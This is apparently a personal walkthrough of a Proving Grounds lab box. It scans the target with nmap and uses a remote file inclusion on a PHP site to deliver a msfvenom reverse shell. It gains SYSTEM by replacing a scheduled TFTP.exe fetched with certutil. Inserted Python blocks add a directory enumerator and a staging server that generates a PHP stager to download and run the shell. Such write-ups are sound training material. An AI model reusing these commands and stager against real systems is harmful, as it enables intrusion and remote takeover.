April 22nd 2023
Target given: 192.168.53.53
Nmap on target: sudo nmap -sC -sV -v -p- 192.168.53.53 (-sC default scripts; -sV service versions; -v verbose, so results show up while the scan is still running and I can start researching sooner; -p- all 65535 TCP ports)
Takes some time since -p- with -sC runs a lot of scripts against every open port.
Results show it's a Windows box, given all the MSRPC ports open.
Also 445 is SMB.
Zenith AI analysis:
So now to check the versions for vulns.
Welp, a DoS won't get root, so onto the next.
Maybe connect to the SMB file share with a client as an anonymous / null user?
I mean, it was worth a shot. You know, sometimes the easiest way into a treasure trove is through the front door 😆
Now to check the web pages on 443 and 8080 to see if there are websites. There's a MariaDB on 3306, so it may be worth seeing if I can get at it through the sites.
443 over https didn't load, but 8080 did.
Time to rip it apart, using grep to filter the output since I don't want spam from 400 status codes.
Will hit up parent directories first, then children if needed. Mass open: site, dashboard, and img.
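The "drop the noisy status codes, parents first, children only if needed" enumeration above, as an added example in Python rather than the original write-up's wordlist tool piped through grep. The base URL, the wordlist and the FAKE_SITE map are constructed for the offline demo and are not captured from the real target; swapping in the default http_status fetcher runs it live.

```python
"""Breadth-first directory enumeration with status-code filtering.

Added example, not code from the original write-up: it implements the
"filter out the 400s, hit parent directories first, then children" approach
in Python instead of a wordlist tool piped through grep. The base URL, the
wordlist and the FAKE_SITE map below are constructed for illustration.
"""
from __future__ import annotations

import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List
from urllib.parse import urlsplit

# Status codes that mean "nothing interesting here" and are dropped from the
# results. 403 is deliberately NOT in this set: a forbidden path still exists.
NOISE = {400, 404}

# Constructed stand-in for the 8080 site: path -> status code. Assumption for
# the offline demo; not captured from the real target.
FAKE_SITE: Dict[str, int] = {
    "/index.php": 200,
    "/site/": 200,
    "/dashboard/": 200,
    "/img/": 200,            # directory listing enabled, hence the 200
    "/admin/": 403,
    "/site/index.php": 200,
    "/dashboard/index.php": 200,
}

WORDS = ["site", "dashboard", "img", "admin", "index", "backup"]


def http_status(url: str, timeout: float = 5.0) -> int:
    """Live fetcher: GET the URL and return only the status code.
    Some servers answer HEAD differently from GET, so GET is used and the
    body is discarded."""
    req = urllib.request.Request(url, headers={"User-Agent": "dir-enum/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def fake_status(url: str) -> int:
    """Offline fetcher that answers from FAKE_SITE (404 for anything else)."""
    return FAKE_SITE.get(urlsplit(url).path, 404)


def enumerate_paths(
    base_url: str,
    words: Iterable[str],
    fetch: Callable[[str], int] = http_status,
    noise: set = NOISE,
    exts: tuple = (".php",),
    depth: int = 1,
) -> Dict[str, int]:
    """Return {path: status} for every probe whose status is not in `noise`.

    Pass 0 probes each word as a directory ("/word/") and as a file
    ("/word.php") directly under base_url. Every directory that answers is
    queued as a parent, and the next pass probes the same wordlist under it,
    up to `depth` extra levels. Parents first, children only if needed.
    """
    base = base_url.rstrip("/")
    words = list(words)
    found: Dict[str, int] = {}
    frontier: List[str] = ["/"]
    for _level in range(depth + 1):
        children: List[str] = []
        for parent in frontier:
            for word in words:
                dir_path = f"{parent}{word}/"
                status = fetch(base + dir_path)
                if status not in noise:
                    found[dir_path] = status
                    children.append(dir_path)
                for ext in exts:
                    file_path = f"{parent}{word}{ext}"
                    status = fetch(base + file_path)
                    if status not in noise:
                        found[file_path] = status
        if not children:
            break
        frontier = children
    return found


if __name__ == "__main__":
    # Offline demo against the constructed site map. Leave fetch at its
    # default (http_status) to run it against a real target.
    hits = enumerate_paths("http://192.168.53.53:8080", WORDS, fetch=fake_status)
    for path, status in hits.items():
        print(f"{status} {path}")
```

Keeping 403 out of the noise set is the point of filtering on status rather than on "not 200": a forbidden directory is still a directory, and it is exactly the kind of thing worth probing for children.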
Well, img is sus since it exposes a directory listing of the files like that.
Also site is sketch since it references the page to render as a .php file through a parameter (local file inclusion, LFI), so maybe I can make it grab things that aren't local (remote file inclusion)?
My IP is 192.168.49.53, so I'll try a netcat (nc) listener to catch the inbound request.
Also, wow, the Proving Grounds default Kali is so slow. Will need to VPN in and do these on my own Kali since this is ridiculous.
Well, the target system spoke Spanish: it requested /hola, but there was no "Hola! Como estas?" /hola page from me, thus the connection closed.
At least it can connect to an attack box and try to pull a page, so now to have it pull a reverse shell from me.
I read somewhere that it's best to first pull a small stager that isn't the reverse shell itself but a page that downloads the reverse shell onto the target and then runs it once it has landed there. Since the target web server executes PHP, we'll match the format and give it a .php file.
Let's craft the reverse shell via msfvenom.
Since the target is running a PHP site, we'll use a PHP reverse shell. Also, since 445 is open, we'll use that as the listening port: outbound connections to a well-known port like that are less likely to be blocked by egress filtering than some random high port.
msfvenom -p php/reverse_php LHOST=192.168.49.53 LPORT=445 > reverse.php
Now to set up an HTTP server so the target can actually download them:
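The two-step delivery described above (target includes /hola from the attack box, /hola pulls reverse.php down and includes it), as an added Python staging server that is not part of the original write-up. It logs every request, which is how the /hola callback was spotted in the first place. LHOST, the ports, the file names and the placeholder payload bytes in the dry run are assumptions; the real reverse.php is whatever msfvenom produced.

```python
"""Attacker-side staging server for the two-step PHP delivery above.

Added example, not code from the original write-up. The flow it supports:
the vulnerable page parameter includes http://LHOST/hola; /hola is a tiny
PHP stager that downloads reverse.php next to the including script and then
includes it, so the reverse shell runs inside the same request. Every
request is logged (client IP, path, User-Agent). LHOST, the ports, the file
names and the sample payload bytes in the dry run are assumptions.
"""
from __future__ import annotations

import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List, Tuple


def make_stager(lhost: str, http_port: int, payload_name: str = "reverse.php") -> bytes:
    """Build the first-stage PHP that fetches and runs the real payload.
    It relies on allow_url_fopen, the same setting the RFI itself needs."""
    php = (
        "<?php\n"
        f"$src = 'http://{lhost}:{http_port}/{payload_name}';\n"
        f"$dst = __DIR__ . '/{payload_name}';\n"
        "$body = @file_get_contents($src);\n"
        "if ($body === false || @file_put_contents($dst, $body) === false) {\n"
        "    die('stage 1 failed');\n"
        "}\n"
        "include $dst;\n"
    )
    return php.encode()


class StagingHandler(BaseHTTPRequestHandler):
    """Serves an in-memory {path: bytes} map and records every request."""

    files: Dict[str, bytes] = {}
    log: List[Tuple[str, str, str]] = []   # (client ip, path, user-agent)

    def do_GET(self) -> None:
        self.log.append((self.client_address[0], self.path,
                         self.headers.get("User-Agent", "")))
        body = self.files.get(self.path)
        if body is None:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args) -> None:  # silence the default stderr log
        pass


def serve(files: Dict[str, bytes], host: str = "0.0.0.0", port: int = 80) -> Tuple[HTTPServer, int]:
    """Start the staging server in a background thread; return it and its port."""
    StagingHandler.files = files
    StagingHandler.log = []
    srv = HTTPServer((host, port), StagingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch(port: int, path: str, host: str = "127.0.0.1") -> Tuple[int, bytes]:
    """Minimal client used to play the part of the target in the dry run."""
    try:
        with urllib.request.urlopen(f"http://{host}:{port}{path}", timeout=5) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""


def dry_run(reverse_php: bytes, lhost: str = "192.168.49.53") -> Tuple[Dict[str, int], List[Tuple[str, str, str]]]:
    """Stand up the server on a loopback port and replay what the target does:
    pull /hola, then /reverse.php, plus one miss. Returns (statuses, log).
    The stager text still points at lhost:80, as it would in a real run."""
    files = {"/hola": make_stager(lhost, 80), "/reverse.php": reverse_php}
    srv, port = serve(files, host="127.0.0.1", port=0)
    try:
        statuses = {p: fetch(port, p)[0] for p in ("/hola", "/reverse.php", "/missing")}
    finally:
        srv.shutdown()
        srv.server_close()
    return statuses, list(StagingHandler.log)


if __name__ == "__main__":
    # Constructed placeholder payload for the demo; use the msfvenom output for real.
    statuses, log = dry_run(b"<?php echo 'payload placeholder'; ?>")
    print(statuses)
    for ip, path, ua in log:
        print(f"{ip} requested {path} ({ua})")
```

For a live run, call serve({"/hola": make_stager(LHOST, 80), "/reverse.php": open("reverse.php", "rb").read()}) and watch StagingHandler.log: a hit on /hola with no follow-up for /reverse.php means the include ran but the stager could not write the file, which is a different problem from the RFI not firing at all.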
And I'm in. Remember to use "type" to read files on Windows.
After submitting the access flag, I'm going for root / SYSTEM.
Time to explore.
TFTP.exe runs every 5 minutes and probably runs with SYSTEM privileges. Worth confirming what account it actually runs under and that my current user can overwrite the file before counting on it.
I'll replace TFTP.exe with my own version for a more privileged shell.
It's normal to have tens of thousands of bytes of bloat since it's a Windows executable.
Now to download the new TFTP.EXE file onto the target:
certutil.exe -f -urlcache -split http://192.168.49.53:80/TFTP.EXE
(With no destination filename given, certutil saves it in the current directory under the name from the URL. certutil downloads are a well-known LOLBin trick and commonly flagged by AV, fine for a lab box.)
Got 200 codes from my HTTP server for the new .exe, so now make a new listener and wait for the connection to come in and catch a SYSTEM-level shell before looking for the system-level flags.